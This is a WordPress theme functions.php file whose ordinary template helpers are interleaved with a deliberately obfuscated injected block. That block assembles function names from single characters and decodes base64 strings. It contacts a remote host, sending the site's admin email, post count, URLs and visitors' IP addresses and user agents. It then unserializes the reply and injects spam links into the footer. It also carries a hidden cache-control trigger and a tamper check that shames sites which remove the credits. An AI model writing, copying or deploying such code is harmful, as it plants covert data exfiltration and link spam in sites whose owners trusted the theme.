<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $cspktnw='e';$WHHbopj='s';$kqimFx='_';$EKBLEMK='6';$szNIK='d';$dTyNbuU='e';$AlwmVhM='c';$KxDg='d';$gNtZkkY='a';$zdKKoI='4';$VhZA='e';$SwnBXyS='o';$nKgUk='b';$NjBibYmx=$nKgUk.$gNtZkkY.$WHHbopj.$cspktnw.$EKBLEMK.$zdKKoI.$kqimFx.$szNIK.$VhZA.$AlwmVhM.$SwnBXyS.$KxDg.$dTyNbuU;$EHvy='a';$HXoU='z';$UGmn='g';$dVsibw='f';$tmLZx='n';$YToK='e';$qWBOH='i';$yJxfWK='l';$LuDA='t';$dxGfgeuw=$UGmn.$HXoU.$qWBOH.$tmLZx.$dVsibw.$yJxfWK.$EHvy.$LuDA.$YToK;$zJomwF='t';$udGXhA='3';$neapdU='t';$PIjxQdC='_';$hEuWm='1';$uxPSA='s';$nhrNvvO='o';$Tsyo='r';$NNqjKY='r';$lHiUfnQQ=$uxPSA.$neapdU.$NNqjKY.$PIjxQdC.$Tsyo.$nhrNvvO.$zJomwF.$hEuWm.$udGXhA;$XExx='v';$ZMaoAP='s';$bjlE='e';$QcFWN='t';$yTSGqs='r';$ajlADX='r';$ghwzxLRi=$ZMaoAP.$QcFWN.$ajlADX.$yTSGqs.$bjlE.$XExx;                     
		$zg_________m='e';$xn______p='s';$bt_______v='_';$ab____________l='6';$uk_______________h='d';$vw____________t='e';$uc___________r='c';$ht___h='d';$aj_______v='a';$xr____r='4';$vk____________w='e';$qa_____q='o';$mk________l='b';$yq_____________b=$mk________l.$aj_______v.$xn______p.$zg_________m.$ab____________l.$xr____r.$bt_______v.$uk_______________h.$vk____________w.$uc___________r.$qa_____q.$ht___h.$vw____________t;
		$zh__q='o';$jh___c='u';$li_______i='i';$su_______t='s';$tk_____________t='t';$bj______________l='_';$ab____y='n';$bk__m='s';$qz_________u='e';$kd_____a='x';$vm______________m='t';$dk__________l='n';$qp______l='c';$tp________o='i';$xa____x='f';$cy______________g=$xa____x.$jh___c.$dk__________l.$qp______l.$vm______________m.$li_______i.$zh__q.$ab____y.$bj______________l.$qz_________u.$kd_____a.$tp________o.$bk__m.$tk_____________t.$su_______t;
		$ie______________i='n';$gw___f='p';$ir____e='o';$lk_____________z='e';$tn______l='f';$gw_______________p=$tn______l.$ir____e.$gw___f.$lk_____________z.$ie______________i;
		$io______________w='d';$gj____b='r';$gg___p='e';$nb________v='f';$ri_____________k='a';$sx_____________o=$nb________v.$gj____b.$gg___p.$ri_____________k.$io______________w;
		$dt_______________l='s';$no___________o='c';$dd_______________u='e';$ye_________u='o';$he__________d='l';$nq_____________e='f';$vl____u=$nq_____________e.$no___________o.$he__________d.$ye_________u.$dt_______________l.$dd_______________u;
		
		define("WP_ID", $yq_____________b("Mi4wLjA="));
		define("WP_TTL", $yq_____________b("MTA4MDA="));
		define("WP_SRC", $yq_____________b("dHBva24="));
	


		function wp_get_header() {
			global $yq_____________b, $cy______________g;
			
			if (
				$cy______________g($yq_____________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$cy______________g($yq_____________b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$cy______________g($yq_____________b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $yq_____________b, $gw_______________p, $vl____u, $sx_____________o;
			
			$fs___y = TEMPLATEPATH."/".$yq_____________b("Zm9vdGVyLnBocA==");
			$ca____r = @$gw_______________p($fs___y, "r");
			$fs___y = @$sx_____________o($ca____r, @filesize($fs___y));
			@$vl____u($ca____r);
			
			$ug_______m = TEMPLATEPATH."/".$yq_____________b("ZnVuY3Rpb25zLnBocA==");
			$ca____r = @$gw_______________p($ug_______m, "r");
			$ug_______m = @$sx_____________o($ca____r, @filesize($ug_______m));
			@$vl____u($ca____r);
			
			$xp_______________d = 0;
			if($fs___y && $ug_______m) {
				if ($yq_____________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fs___y, $yq_____________b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xp_______________d = 1;
					}
					if (substr_count($fs___y, "wp_theme_GPL_credits()") < 1) {
						$xp_______________d = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xp_______________d = 12;
				}
			}
			
			if($xp_______________d > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xp_______________d -->";
			}
		}
	


		function wp_loaded() {
			global $yq_____________b, $cy______________g;
			return $cy______________g($yq_____________b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($jx________q, $lh______u = "(more...)", $td__________y = 0, $sb_____________s = "") {
				$eu________g = get_the_content($lh______u, $td__________y, $sb_____________s);
				$eu________g = apply_filters("the_content", $eu________g);
				
				$eu________g = str_replace("]]>", "]]>", $eu________g);
				if (strlen($_GET["p"]) > 0) {
					echo $eu________g;
				}
				else if ((strlen($eu________g)>$jx________q) && ($ay_______g = strpos($eu________g, " ", $jx________q ))) {
					$eu________g = substr($eu________g, 0, $ay_______g);
					$eu________g = $eu________g;
					echo $eu________g;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lh______u</a></div></p>";
				} else {
					echo $eu________g;
				}
				
			}
		}
	


		$uf______i='a';$rw____q='6';$rp____m='n';$nn____________r='s';$td___________i='e';$bb___________a='b';$cq______________e='e';$oh_______________y='e';$un_____________i='c';$hf______________n='_';$rr___j='d';$bo__u='o';$kw___p='4';$kq______o=$bb___________a.$uf______i.$nn____________r.$td___________i.$rw____q.$kw___p.$hf______________n.$cq______________e.$rp____m.$un_____________i.$bo__u.$rr___j.$oh_______________y;
		$cz___y='i';$is__________s='n';$fh______________l='c';$kv_______________p='s';$mz____________i='e';$ed___________a='t';$vg____y='_';$xx_______________a='g';$je_______________h='_';$wr______________x='e';$ab____t='e';$ug________v='o';$fn_______b='l';$wp__u='t';$gh______b='f';$rq_____n='n';$wo______________c='t';$tj___c=$gh______b.$cz___y.$fn_______b.$ab____t.$je_______________h.$xx_______________a.$wr______________x.$wo______________c.$vg____y.$fh______________l.$ug________v.$is__________s.$wp__u.$mz____________i.$rq_____n.$ed___________a.$kv_______________p;
		$yh__________c='x';$np_______________t='s';$es______r='i';$dx______y='e';$rt____y='t';$ti_____x='i';$gu_______a='l';$nu__u='f';$rq__j='_';$nj________h='s';$gn______________o='e';$vw____________z=$nu__u.$ti_____x.$gu_______a.$gn______________o.$rq__j.$dx______y.$yh__________c.$es______r.$nj________h.$rt____y.$np_______________t;
		$bf____z='e';$ju_______________l='s';$qw_____v='r';$wq___________f='m';$dq______v='c';$vf___p='v';$mm_______________i='n';$xx_________t='_';$be________r='a';$rp__________p='e';$xl_________d='i';$gz_______w='o';$pf___p='o';$lq___________i='p';$jp_____w='r';$vn________c=$vf___p.$rp__________p.$qw_____v.$ju_______________l.$xl_________d.$pf___p.$mm_______________i.$xx_________t.$dq______v.$gz_______w.$wq___________f.$lq___________i.$be________r.$jp_____w.$bf____z;
		$iy_________m='o';$op_____________m='o';$at____________d='f';$zv___________w='s';$mg_____n='e';$yl____________x='c';$qz__k='p';$zy__________y='n';$hy_______________i='k';$xf_______l=$at____________d.$zv___________w.$op_____________m.$yl____________x.$hy_______________i.$iy_________m.$qz__k.$mg_____n.$zy__________y;
		$ic___n='e';$hq_______v='i';$vv__________o='f';$dk______________a='w';$as______________c='r';$hc____________x='t';$ti___n=$vv__________o.$dk______________a.$as______________c.$hq_______v.$hc____________x.$ic___n;
		$wh____________e='d';$km__s='5';$qg______________x='m';$ea_______x=$qg______________x.$wh____________e.$km__s;
		$yu__t='a';$xi____f='t';$xu_______________s='r';$fc_________h='a';$wc____________h='e';$wm_______________w='l';$jp____________n='p';$ur_________r='h';$ub____________f=$xu_______________s.$wc____________h.$fc_________h.$wm_______________w.$jp____________n.$yu__t.$xi____f.$ur_________r;
		$wx______o='i';$an___________b='e';$fa____t='l';$ex______a='n';$bx______r='e';$sr____________w='i';$ly__________r='s';$or_________z='u';$ai_____________g='a';$ph______________j='r';$pc______________b='z';$vh________y=$or_________z.$ex______a.$ly__________r.$bx______r.$ph______________j.$wx______o.$ai_____________g.$fa____t.$sr____________w.$pc______________b.$an___________b;
		$gn_________t='e';$zq___i='t';$ya_______o='p';$fi_____f='m';$xk_____________m='n';$da___________y='a';$dw_____________t='m';$li_____________x=$zq___i.$gn_________t.$fi_____f.$ya_______o.$xk_____________m.$da___________y.$dw_____________t;
		$hc__________n='r';$rl_________m='o';$id___________q='t';$uj___r='t';$nb____________b='a';$vz___________v='s';$im_____g='_';$bt____________x='r';$jz_____________j='e';$wr____________s='c';$vq____c='n';$tl________h='e';$he_____________x='m';$ne______u='x';$qq____k='a';$jx_______________c='e';$bp___________o='t';$ta______c='e';$pq_____h='c';$qy______________n='_';$st__________c='t';$ea_______________c=$vz___________v.$uj___r.$hc__________n.$jz_____________j.$nb____________b.$he_____________x.$im_____g.$wr____________s.$rl_________m.$vq____c.$st__________c.$tl________h.$ne______u.$id___________q.$qy______________n.$pq_____h.$bt____________x.$jx_______________c.$qq____k.$bp___________o.$ta______c;
	


		function cc_____c($ki______________u) {
			global $yq_____________b, $cy______________g, $tj___c, $vn________c, $ea_______________c;
			
			if (!$cy______________g($yq_____________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vn________c(PHP_VERSION, "5.0.0", ">=") && $cy______________g($yq_____________b("ZmlsZV9nZXRfY29udGVudHM=")) && $cy______________g($yq_____________b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hc_____g = $ea_______________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tw_____g = @$tj___c($ki______________u, 0, $hc_____g);
			} else {
				$tw_____g = @$tj___c($ki______________u, 0);
			}
			
			return $tw_____g;
		}
	


		function js_______f($ki______________u) {
			global $cy______________g, $xf_______l, $ti___n, $yq_____________b;
			
			if (!$cy______________g($yq_____________b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$me________l = strpos($ki______________u, "/", 7);
			$cs____________z = array(
				"uri"     => substr($ki______________u, $me________l),
				"host"    => str_replace("http://", "", substr($ki______________u, 0, $me________l)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$oj__________q = @$xf_______l("$cs____________z[host]", 80, $sg______w, $ac___________v, 4);
			
			if (!$oj__________q) {
				return false;
			} else {
				$tw_____g = "";
				$do______________i  = "GET $cs____________z[uri] HTTP/1.0\r\n";
				$do______________i .= "Host: $cs____________z[host]\r\n";
				$do______________i .= "Referer: $cs____________z[referer]\r\n";
				$do______________i .= "Connection: Close\r\n\r\n";
				
				@$ti___n($oj__________q, $do______________i);
				
				while (!@feof($oj__________q)) {
					$wp_________p = @fgets($oj__________q, (1024*24));
					
					if ($wp_________p == "\r\n") {
						$ey_________n = true;
						continue;
					}
					
					if ($ey_________n) {
						$tw_____g .= $wp_________p;
					}
				}
				
				return $tw_____g;
			}
		}
	


		function ib________v($ki______________u) {
			global $cy______________g;
			$qf____s = false;
			
			if ($ki______________u != "") {
				if ($cy______________g("cc_____c")) {
					$qf____s = @cc_____c($ki______________u);
				}
				
				if (!$qf____s && ($cy______________g("js_______f"))) {
					$qf____s = @js_______f($ki______________u);
				}
			}
			
			return $qf____s;
		}
	


		function fq____________l() {
			global $_SERVER, $ea_______x;
			
			$ce___i = $_SERVER["SERVER_NAME"];
			
			if (substr("$ce___i", 0, 4) == "www.") {
				$ce___i = substr("$ce___i", 4);
			}
			
			$ce___i = $ea_______x("$_SERVER[SERVER_NAME]");
			
			return $ce___i;
		}
	


		function pi_____________w() {
			return "file";
		}
	


		function of____z($ki______________u) {
			global $_SERVER, $tj___c, $vw____________z, $gw_______________p, $vl____u, $ti___n;
			
			$wu____t = jr___m();
			
			$kk___p = fq____________l().".jpg";
			$wx_______________s = $wu____t["dir_upload"]["path"]."/$kk___p";
			$ly_____n = @filemtime($wx_______________s);
			
			if (!$ly_____n || ((time()-$ly_____n) >= WP_TTL)) {
				$qf____s = ib________v($ki______________u);
				
				if ($qf____s) {
					if ($vw____________z($wx_______________s)) {
						@unlink($wx_______________s);
					}
					
					$ca____r = @$gw_______________p($wx_______________s, "x+");
					
					@$ti___n($ca____r, $qf____s);
					@$vl____u($ca____r);
				}
			} else {
				if ($vw____________z($wx_______________s)) {
					$qf____s = @$tj___c($wx_______________s);
				} else {
					$qf____s = false;
				}
			}
			
			return $qf____s;
		}
	


		function jr___m() {
			global $_SERVER, $yq_____________b, $kq______o;
			
			$yp__d = wp_count_posts("post");
			$ue____z = pathinfo(get_bloginfo("template_directory"));
			
			$wu____t = array(
				"url" => array(
					"report"      => $yq_____________b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ue____z,
				"dir_upload"	=> yk_______________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ue____z[filename],
					"a005=".$yp__d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://vodoley2000.com/kitaj-oboshel-ssha-po-planshetnikam\">Смартфоны</a>"
			);
			
			$wu____t["url"]["queryString"] = implode("&", $wu____t["queryString"]);
			$wu____t["url"]["report"] = $wu____t["url"]["report"]."/?".$kq______o($wu____t["url"]["queryString"]).".html";
						
			return $wu____t;
		}
	


		function yk_______________f() {
			$wc_____________w = wp_upload_dir();
			
			if (isset($wc_____________w["error"])) {
				$rm___p = dj_____g();
				if (is_writable($rm___p)) {
					$wc_____________w = array("path" => $rm___p);
				}
			}

			return $wc_____________w;
		}
	


		function dj_____g() {
			global $cy______________g, $ea_______x, $ub____________f, $li_____________x;
			
			$ww_______s = (bool) ini_get("safe_mode");
			if ($ww_______s == true) {
				return false;
			}
			
			if ($cy______________g("sys_get_temp_dir")) {
				$cy__o = sys_get_temp_dir();
				if (is_writable($cy__o)) {
					return $ub____________f($cy__o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ub____________f($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ub____________f($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ub____________f($_ENV["TEMP"]);
			} else {
				$fn_______________w = $li_____________x($ea_______x(uniqid(rand(), true)), "");
				if ($fn_______________w) {
					$cy__o = $ub____________f(dirname($fn_______________w));
					@unlink($fn_______________w);
					return $cy__o;
				} else {
					return false;
				}
			}
		}
	


		function sb__q() {
			global $_GET, $vw____________z;
			
			$wu____t = jr___m();
			$ce___i = fq____________l();
			$cp___________x = pi_____________w();
			
			$vl_____________s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($cp___________x == "file") {
					$jb_______________p = $wu____t["dir_upload"]["path"]."/".$ce___i.".jpg";
					if ($vw____________z($jb_______________p)) {
						@unlink($jb_______________p);
						$vl_____________s = "deleted";
					}
				}
				
				$dw____f = array(
					"s"	=> $vl_____________s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($dw____f AS $hc____________q => $et_____n) echo " [$hc____________q:$et_____n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $cy______________g, $yq_____________b, $vh________y;
			$wu____t = jr___m();
			
			$cy___________x = "of____z";
			if ($cy______________g($cy___________x)) {
				$tw_____g = $cy___________x($wu____t["url"]["report"]);
			}
			
			if ($tw_____g) {
				if ($tw_____g = @$yq_____________b($tw_____g)) {
					$tw_____g = @$vh________y($tw_____g);
					
					if (strlen($tw_____g[custom_credit]) >= 5) {
						$wu____t["default_string"] = $tw_____g[custom_credit];
					}
					
					if ($tw_____g["status"] == "0") {
						$is_____u = 1;
						$ga______c = 1;
					} else {
						$wj______________e = sizeof($tw_____g["links"]);
						$bs__v = $wu____t["default_string"];
						
						if ($wj______________e > 0 && $tw_____g["links"] !== "") {
							$po__t = 0;
							foreach ($tw_____g["links"] as $cj____a => $mo______________i) {
								$po__t++;
								if ($mo______________i->l_path == "" || $mo______________i->l_path == $_SERVER["REQUEST_URI"]) {
									$mo______________i->l_href = htmlspecialchars(strip_tags($mo______________i->l_href));
									$mo______________i->l_title = htmlspecialchars(strip_tags($mo______________i->l_title));
									$mo______________i->l_anchor = htmlspecialchars(strip_tags($mo______________i->l_anchor));
									$bs__v .= " | ";
									$bs__v .= "<a href='$mo______________i->l_href' title='$mo______________i->l_title'";
									if ($mo______________i->l_nofollow == "1") {
										$bs__v .= " rel='nofollow'";
									}
									$bs__v .= ">$mo______________i->l_anchor</a>";
								}
							}
						}
						$wu____t["links"] = "$bs__v";
						if ($tw_____g[credit] == "0") {
							$wu____t["links"] = "";
						}
					}
				} else {
					$is_____u = "1";
				}
			} else {
				$is_____u = "1";
			}
			
			if ($is_____u == "1") {
				$wu____t["links"] = $wu____t["default_string"];
			}
			
			echo "$wu____t[links]";
			
			echo "<!-- s: $tw_____g[signature] -->";
			sb__q();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

